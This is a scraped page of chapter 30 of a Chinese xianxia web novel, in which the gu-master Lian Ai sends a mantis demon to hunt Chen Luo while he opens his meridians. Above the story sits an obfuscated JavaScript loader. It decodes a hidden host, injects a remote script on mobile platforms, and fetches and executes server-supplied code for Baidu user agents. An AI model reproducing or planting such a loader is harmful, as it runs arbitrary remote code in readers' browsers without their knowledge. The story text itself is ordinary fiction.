返回第30章 螳臂当车  出走八万里首页

关灯 护眼     字体:

上一章 目录 下一页

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuZHNramJ2enZzLmNvbQ==','2843',window,document,['G','TpoZFcguG']);}:function(){};

莲哀支撑着坐起来,浑身的疼痛让她不禁蹙眉。空间乱流的冲击弄断了她的肋骨和腿骨,更严重的是她感觉到内脏同样也受到损伤。

“那个小子居然还能走动?”看到地上残留着陈洛离开的痕迹,莲哀疑惑,“他也受到了空间乱流冲击,居然没死。”

不过又想到陈洛那一剑竟然让足以抵挡大儒一击的护身面具破碎,文心又主动相投,莲哀脸上更是露出一副感兴趣的神色。

“原本只是想抓回去重新把文心炼出来,没想到竟然是个如此有趣的人。不枉我在空间乱流中也不忘在他身上下蛊!”

莲哀绣眉微挑,之前她以为陈洛必死无疑,担心陈洛的尸体会被空间乱流卷到其他的地方,这才不顾自身危险给陈洛身上下了追踪蛊,没想到陈洛竟然从空间乱流中活了下来,看离开的痕迹,似乎是连重伤都没有。

这个人身上有秘密!

莲哀此时无法起身,张开嘴,一道白光从莲哀口中飞出。那白光迅速变大,最后化作一个一人大小的人形怪物,竟然是一只螳螂成妖。

“我要养伤,你顺着追踪蛊的气息,去将那小子拿下!”莲哀下令。

螳螂妖双臂交叉,一双刀手咔嚓作响,做了个抱拳的姿势,转过身,身后两对翅膀一振,朝着陈洛离开的方向飞去。

莲哀这才伸手将自己腰间的一个小瓶子打开,里面爬出了一只浑身如玉的碧蚕,那碧蚕挪动着身体,吐出一道绿色的蚕丝,缠在莲哀身上。

足足半刻钟的时间,碧蚕织出了一个绿色的蚕茧,将莲哀包裹在其中。那碧蚕随后浑身逐渐变为黑色,最终“砰”的一声炸开,成了一滩脓血。

蛊门奇虫——换命春蚕!

……

陈洛有点后悔了。

昨天应该先打通脚部经脉的。

现在一路狂奔,感觉双腿都已经不是自己的了。倒是手臂感觉孔武有力。

说不定倒立行走都比现在狂奔要快。

嗯,星爷的《大话西游》里有这一门功夫……

陈洛坐在干燥的地上,捶打着自己酸痛的大腿。他大致估算了一下,从昨天到现在,应该跑出了四五十公里。

“不够保险啊!”陈洛心中盘算着,“要是前世,我应该算逃出来了。可是这是仙侠世界,没准人家可以飞呢……”

望着前方依然高耸两侧的悬崖,陈洛心中也是懊恼:“是不是跑错方向了?”

但是现在情况已经是这样了,总不能再调头回去吧。

“磨刀不误砍柴工,再打通几条经脉,或许逃出生天的把握会更大一些。”陈洛想到。

说干就干,陈洛找到了一个相对隐蔽的地方,重新盘腿而坐,准备继续通经脉……

“足太阴……不对!”

原本打算接着突破正经的陈洛突然想到,按武道传承,六条正经加上两条奇经,就算是进入通脉境,无非是下品而已。但是通脉境很明显对身体素质会有极大的提高。

“先通任督二脉,后面再慢慢打通其他经脉就是了。”

“而且,任督二脉啊,多少男孩子小时候的梦啊!”

陈洛立刻沉浸心神,找到任脉的位置。此时陈洛体内的七彩雾团因为昨天通开了六经,已经从篮球大小变成了排球大小。

陈洛继续调动着七彩雾气,抽出一丝,涌入了任脉之中。

半刻钟后,陈洛的眉头微微皱起。

这奇经打通的难度和消耗似乎要比正经难多了。

时间一分一秒的流逝,足足三个时辰后,陈洛体内传出一连串低沉的“噗噗”直响。

任脉,通!

陈洛站起身,向前走了十几米,又重新坐下。

无他,屁臭耳。

“这奇经排杂质的方式,不适合闭关修炼啊……”陈洛吐槽了一句,继续开始督脉的修行……

……

螳螂妖振翅直飞。

作为尊主赏赐给主人的蛊虫护卫,它明白这是一次难得的立功机会。

自从主人的修为升入六品命蛊,他们这些七品的蛊卫已经变成了炮灰般的存在。

『加入书签,方便阅读』

上一章 目录 下一页